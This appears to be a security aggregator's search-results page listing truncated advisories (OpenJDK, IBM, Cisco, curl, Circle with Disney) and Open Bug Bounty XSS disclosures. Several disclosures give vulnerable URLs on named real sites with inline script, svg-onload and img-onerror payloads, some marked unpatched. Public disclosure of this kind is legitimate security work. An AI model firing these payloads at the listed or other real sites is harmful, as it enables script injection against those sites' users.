14554 matches found
Sandbox Restrictions Bypass
The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Ja...
Security Bulletin: IBM System x Integrated Management Module (IMM) Lighttpd W (CVE-2011-4362, CVE-2010-0295, CVE-2008-4360, CVE-2008-4359, CVE-2008-4298, CVE-2008-1531)
Summary Older versions of lighttpd, used by System x IMM, contain multiple vulnerabilities. Vulnerability Details Abstract Older versions of lighttpd, used by System x IMM, contain multiple vulnerabilities. Content Vulnerability Details: CVE ID: CVE-2011-4362 Description: Integer signedness error i...
Man-in-the-Middle (MitM)
kube-rbac-proxy is vulnerable to man-in-the-middle attack. Insecure ciphers and TLS 1.0 are used to establish an SSL connection between the client and server, which would allow a remote attacker to exploit TLS vulnerabilities and perform man-in-the-middle attacks to sniff traffic containing...
Free High-Tech Bridge ImmuniWeb Application Discovery service
Today I would like to talk about another service for application security analysis by High-Tech Bridge. It's called ImmuniWeb Application Discovery. This service can get information about your web and mobile applications available from the Internet. Believe me, this is not so obvious for a large...
Security Bulletin: IBM Security Access Manager for Web - NIST setting (CVE-2014-3052)
Summary A defect in the configuration of IBM Security Access Manager (ISAM) for Web v8.0 could result in systems failing to properly comply with NIST800-131 standards. Vulnerability Details CVE ID : CVE-2014-3052 DESCRIPTION: The reverse proxy component of IBM Security Access Manager for Web can be...
CVE-2018-0233
A vulnerability in the Secure Sockets Layer (SSL) packet reassembly functionality of the detection engine in Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause the detection engine to consume excessive system memory on an affected device, which could cause a...
Storefront ErrorCode=65150 : An SSL connection to the server couldn't be established because the server's certificate was not trusted.
When you open Citrix Receiver inside the Desktop VDA ICA Session, you don’t get the Login prompt even because you get an error while connecting to the Store which points to the NS LB VIP. You can see errorCode=65150 : An SSL connection to the server couldn't be established because the server's...
CVE-2017-9968
A security misconfiguration vulnerability exists in Schneider Electric's IGSS Mobile application versions 3.01 and prior in which a lack of certificate pinning during the TLS/SSL connection establishing process can result in a man-in-the-middle attack...
Circle with Disney Rclient SSH Persistent Remote Access Vulnerability(CVE-2017-12084)
Summary A backdoor vulnerability exists in remote control functionality of Circle with Disney running firmware 2.0.1. A specific set of network packets can remotely start an SSH server on the device, resulting in a persistent backdoor. An attacker can send an API call to enable the SSH server. Tested...
ru.marein.it XSS vulnerability
Vulnerable URL: https://ru.marein.it/prod.taf?code=%E2%80%9D%3E%3Csvg%20onload=alert1337%3E Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check ru.marein.it SSL...
SUSE-SU-2017:2831-1 Security update for curl
This update for curl fixes the following issues: Security issues fixed: - CVE-2017-1000254: FTP PWD response parser out of bounds read bsc1061876 - CVE-2017-1000257: IMAP FETCH response out of bounds read bsc1063824 Bugs fixed: - Fixed error 'error:1408F10B:SSL routines' when connecting to ftps v...
antiwar.com XSS vulnerability
Vulnerable URL: http://www.antiwar.com///archives.php?author=" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 19.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 64654 VIP website status:| No Check antiwar.com SSL connection:| Grade...
muellerscience.com XSS vulnerability
Vulnerable URL: http://www.muellerscience.com/searchresult.php?sw=%27%22/%3E%3Cscript%3Ealert/OPENBUGBOUNTY/;%3C/script%3E=0=0=2=0=0=43 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 18.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Ran...
gogolistings.com XSS vulnerability
Vulnerable URL: http://www.gogolistings.com//?cityid=1〈=en="=50=ads Details: Description| Value ---|--- Patched:| No Latest check for patch:| 16.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 989552 VIP website status:| No Check gogolistings.com SSL...
kb-fr.sandisk.com XSS vulnerability
Vulnerable URL: http://kb-fr.sandisk.com/app/error/errorid/404/url/%2522%253E%253Cimg%2520src%253D1%2520onerror%253Dprompt%2528'openbugbounty'%2529%253E\n Details: Description| Value ---|--- Patched:| No Latest check for patch:| 16.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly...
listyourself.net XSS vulnerability
Vulnerable URL: https://www.listyourself.net/BulkList/SignUp.jsp?Name=xss%22%3E%3Csvg/onload=prompt/openbugbounty/%3E=9025%20Avenue%20Pointe%20Circle,%20Suite%20206%20%0DOrlando,%20FL,%[email protected]=3212365136=Quick Details: Description| Value ---|--- Patched:| No Late...
minnstate.edu XSS vulnerability
Vulnerable URL: http://www.minnstate.edu/jobs/searchResults.php?keyWord='"====10=Search=inst=6 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 15.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 393250 VIP website status:| No Check...
collegeofsanmateo.edu XSS vulnerability
Vulnerable URL: https://collegeofsanmateo.edu/siteindex/index.php?keyword='" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 15.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 149793 VIP website status:| No Check collegeofsanmateo.e...
dobi.ch XSS vulnerability
Vulnerable URL: https://www.dobi.ch/search?text=qqqqqqqqqqqqqqqqqqqqqqqq"-promptOPENBUGBOUNTY-" Details: Description| Value ---|--- Patched:| Verification in progress Latest check for patch:| 15.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1082052 VIP...
creps-montpellier.org XSS vulnerability
Vulnerable URL: https://www.creps-montpellier.org/search-result?s=+%3Cscript%3Ealert%27OPENBUGBOUNTY%27%3C/script%3E\n Details: Description| Value ---|--- Patched:| No Latest check for patch:| 14.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 4423718 VIP...